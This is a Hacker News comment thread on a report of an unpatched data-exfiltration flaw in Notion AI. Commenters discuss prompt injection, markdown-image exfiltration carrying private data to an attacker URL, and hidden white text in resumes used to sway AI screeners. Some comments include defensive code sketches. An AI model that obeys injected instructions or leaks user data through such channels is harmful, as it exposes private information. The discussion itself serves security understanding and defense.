Notion AI: Unpatched data exfiltration

(promptarmor.com)

201 points | by takira a day ago

34 comments

  • rdli a day ago

    Securing LLMs is just structurally different. The attack space is "the entirety of the human written language" which is effectively infinite. Wrapping your head around this is something we're only now starting to appreciate.

    In general, treating LLM outputs (no matter where) as untrusted, and ensuring classic cybersecurity guardrails (sandboxing, data permissioning, logging) is the current SOTA on mitigation. It'll be interesting to see how approaches evolve as we figure out more.

    • kahnclusions 21 hours ago

      I’m not convinced LLMs can ever be secured; prompt injection isn’t going away, since it’s a fundamental part of how an LLM works. Tokens in, tokens out.

    • vmg12 a day ago

      It's pretty simple: don't give LLMs access to anything that you can't afford to expose. Treat the LLM as if it were the user.
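
      The "treat the LLM as the user" rule could be sketched roughly like this (all names hypothetical): every tool call the model makes is authorized against the end user's ACL, never against a privileged service account.

```python
# Sketch (hypothetical names): any document read the LLM requests is
# checked against the *requesting user's* ACL, exactly as if the user
# had asked for it directly -- the model holds no extra privileges.
ACL = {
    "alice": {"notes/alice-todo.md"},
    "bob": {"notes/bob-okrs.md", "notes/team-wiki.md"},
}

def read_document(requesting_user: str, path: str) -> str:
    """Tool exposed to the LLM; runs with the user's permissions only."""
    if path not in ACL.get(requesting_user, set()):
        raise PermissionError(f"{requesting_user} cannot read {path}")
    return f"<contents of {path}>"
```

      A prompt-injected request for someone else's document then fails the same way it would for the user themselves.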

      • rdli a day ago

        I get that, but it's just not entirely obvious how you do that for Notion AI.

        • embedding-shape 13 hours ago

          Don't use AI/LLMs that have unfettered access to everything?

          Feels like the question is "How do I prevent unauthenticated and anonymous users from using my endpoint that doesn't have any authentication and is on the public internet?", which is the wrong question.

        • whateveracct 8 hours ago

          exactly?

    • jcims 14 hours ago

      As multi-step reasoning and tool use expand, they effectively become distinct actors in the threat model. We have no idea how many different ways the alignment of models can be influenced by the context (the Anthropic paper on subliminal learning [1] was a bit eye-opening in this regard), and consequently we have no deterministic way to protect it.

      1 - https://alignment.anthropic.com/2025/subliminal-learning/

      • zbentley an hour ago

        I’d argue they’re only distinct actors in the threat model as far as where they sit (within which perimeters), not in terms of how they behave.

        We already have another actor in the threat model that behaves equivalently as far as determinism/threat risk is concerned: human users.

        Issue is, a lot of LLM security work assumes they function like programs. They don’t. They function like humans, but run where programs run.

    • Barrin92 19 hours ago

      Dijkstra, On the Foolishness of "natural language programming":

      [...]It may be illuminating to try to imagine what would have happened if, right from the start our native tongue would have been the only vehicle for the input into and the output from our information processing equipment. My considered guess is that history would, in a sense, have repeated itself, and that computer science would consist mainly of the indeed black art how to bootstrap from there to a sufficiently well-defined formal system. We would need all the intellect in the world to get the interface narrow enough to be usable,[...]

      If only we had a way to tell a computer precisely what we want it to do...

      https://www.cs.utexas.edu/~EWD/transcriptions/EWD06xx/EWD667...

  • brimtown a day ago

    This is @simonw’s Lethal Trifecta [1] again: access to private data and untrusted input are arguably the whole purpose of enterprise agents, so any channel for external communication is unsafe. Markdown images are just the one people usually forget about.

    [1] https://simonwillison.net/2025/Jun/16/the-lethal-trifecta/
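
    A minimal sketch of closing the markdown-image leg of the trifecta (hypothetical allowlist; assumes the renderer, not the model, is the enforcement point): drop any image whose host isn't explicitly trusted, so an injected `![](https://attacker.example/?q=<private data>)` never triggers an outbound request.

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist: the only hosts we trust to receive image fetches.
ALLOWED_IMAGE_HOSTS = {"img.example-cdn.com"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")

def strip_untrusted_images(markdown: str) -> str:
    """Remove markdown images pointing at non-allowlisted hosts, so the
    renderer never fetches an attacker-controlled URL carrying private data."""
    def repl(match: re.Match) -> str:
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else ""
    return MD_IMAGE.sub(repl, markdown)
```

    This is output-side sanitization only; it does nothing about links the user might click, which need the same treatment.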

    • Miyamura80 14 hours ago

      Good point about the markdown image as an untrusted vector. The lethal trifecta is deterministically preventable; it really should be addressed more widely across the industry.

  • falloutx a day ago

    People learned a little while back that you need to use hidden white text in a resume to make the AI recommend you. There are also resume-collecting services that let you buy a set of resumes from your general competition, so you can compare your AI results with theirs. It's an arms race to get called up for a job interview at the moment.
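
    The hidden-white-text trick is easy to screen for on the parsing side. A rough sketch for HTML resumes (regex-based and illustrative only; a real check would parse CSS and catch near-white colors and class-based styles too):

```python
import re

# Matches inline styles that set the *text* color to white; the lookbehind
# avoids false positives on "background-color". Illustrative only.
WHITE_TEXT = re.compile(
    r"(?<!-)color:\s*(?:#fff(?:fff)?\b|white\b|rgb\(\s*255\s*,\s*255\s*,\s*255\s*\))",
    re.I,
)

def find_hidden_text(html: str) -> list[str]:
    """Return the contents of <span> elements styled white-on-white,
    i.e. text invisible to a human reader but visible to an LLM parser."""
    hits = []
    for m in re.finditer(r'<span[^>]*style="([^"]*)"[^>]*>(.*?)</span>',
                         html, re.I | re.S):
        if WHITE_TEXT.search(m.group(1)):
            hits.append(m.group(2).strip())
    return hits
```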

  • noleary 17 hours ago

    > We responsibly disclosed this vulnerability to Notion via HackerOne. Unfortunately, they said “we're closing this finding as `Not Applicable`”.

    • hxugufjfjf 15 hours ago

      As much as I love using Notion, they have a terrible track record when it comes to dealing with and responding to security issues.

  • digiown 10 hours ago

    Any data that leaves the machines you control, especially to a service like Notion, is already "exfiltrated" anyway. Never trust any consumer-grade service, without an explicit contract, with important data you don't want exfiltrated. They will play fast and loose with your data, since there is so little downside.

  • someguyiguess a day ago

    Wow what a coincidence. I just migrated from notion to obsidian today. Looks like I timed it perfectly (or maybe slightly too late?)

    • dtkav a day ago

      How was the migration process?

      I work on a plugin that makes Obsidian real-time collaborative (relay.md), so if the migration is smooth I wonder how close we are to Obsidian being a suitable Notion replacement for small teams.

      • crashabr 14 hours ago

        I've been waiting for Logseq DB to come out to replace Google docs for my team. So your offering is interesting, but

        1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

        2) Don't you expect to be sherlocked by the obsidian team?

        • dtkav 8 hours ago

          In Obsidian you can have transclusions, which are basically an embed of a section of another note. It isn't perfect, but worth looking into.
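
          For reference, Obsidian's embed syntax covers whole notes, sections, and individual blocks:

```
![[Other Note]]            <!-- embed the whole note -->
![[Other Note#Heading]]    <!-- embed one section -->
![[Other Note#^block-id]]  <!-- embed a single block -->
```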

          Regarding getting sherlocked: Obsidian does have real-time collaboration on their roadmap. There are likely to be important differences in approach, though.

          Our offering is available now and we're learning a ton about what customers want.

          If anything, I'd actually love to work more closely with them. They are a huge inspiration in how to build a business, and they represent something close to the state of the art in software philosophy.

          I'm interested in combining the unix philosophy with native collaboration (with both LLMs and other people).

          That vision is inherently collaborative, anti-lock-in, and also bigger than Obsidian. The important lasting part is the graph-of-local-files, not the editor (though Obsidian is fantastic).

        • embedding-shape 13 hours ago

          > 1) is it possible to use Obsidian like Logseq, with a primary block based system (the block based system, which allows building documents like Lego bricks, and easily cross referencing sections of other documents is key to me) and

          More or less, yes. Embeddable templates basically give you that out of the box, and Obsidian "Bases" let you query them.

          > 2) Don't you expect to be sherlocked by the obsidian team?

          I seem to remember that someone from the team once said they have no interest in building "real-time" collaboration features, but I might misremember and I cannot find it now.

          And after all, Obsidian is a for-profit company that can change its mind, so as long as you don't try to build your own for-profit business on top of a use case that could be sherlocked, I think they're fine.

          • dtkav 8 hours ago

            From their roadmap page:

            > Multiplayer
            >
            > Share notes and edit them collaboratively

            https://obsidian.md/roadmap

            • embedding-shape 7 hours ago

              It doesn't say real-time there, though? But yeah, that must be what they mean, because you can in theory already collaborate on notes via their "Sync", although it sucks for real-time collaboration.

  • airstrike a day ago

    IMHO the problem really comes from the browser accessing the URL without explicit user permission.

    Bring back desktop software.

    • embedding-shape 13 hours ago

      Meh, bring back thinking about security regardless of the platform instead. The web is gonna stay; might as well wish for people to treat security on the platform better.

  • jonplackett a day ago

    Sloppy coding to know a link could be a problem and render it anyway. But it's even worse to ignore the person who tells you that you did that.

  • dcreater a day ago

    One more reason not to use Notion.

    I wonder when there will be an awakening to not using SaaS for everything you do. And the sad thing is that this is the behavior of supposedly tech-savvy people in places like the Bay Area.

    I think the next wave is going to be native apps, with a single purchase model - the way things used to be. AI is going to enable devs, even indie devs, to make such products.

    • bossyTeacher 12 hours ago

      > I think the next wave is going to be native apps

      Elaborate, please?

  • jerryShaker a day ago

    Unfortunate that Notion does not seem to be taking AI security more seriously, even after they got flak for other data exfil vulns in the 3.0 agents release in September

  • jrm4 a day ago

    This is, of course, more yelling into the void from decades ago, but companies that promise or imply "safety around your data" and fail should be proportionally punished, and we as a society have not yet figured out how to do that effectively. Not sure what it will take.

    • pluralmonad 17 hours ago

      It's perfectly figured out; people just refuse to implement the solution. Stop giving your resources to the bad actors. The horrible behavior so many enable in order not to be inconvenienced is immense.

      • jrm4 7 hours ago

        Perfectly? No. No. A million times no.

        You're getting downvoted because "stop giving your resources to the bad actors" is not even remotely close to a viable solution. There is no opting out in a meaningful way.

        NOW, that being said. People like you and me should absolutely opt out to the extent that we can, but with the understanding that this is "for show," in a good way.

  • mirekrusin a day ago

    Public disclosure date is Jan 2025, but should be Jan 2026.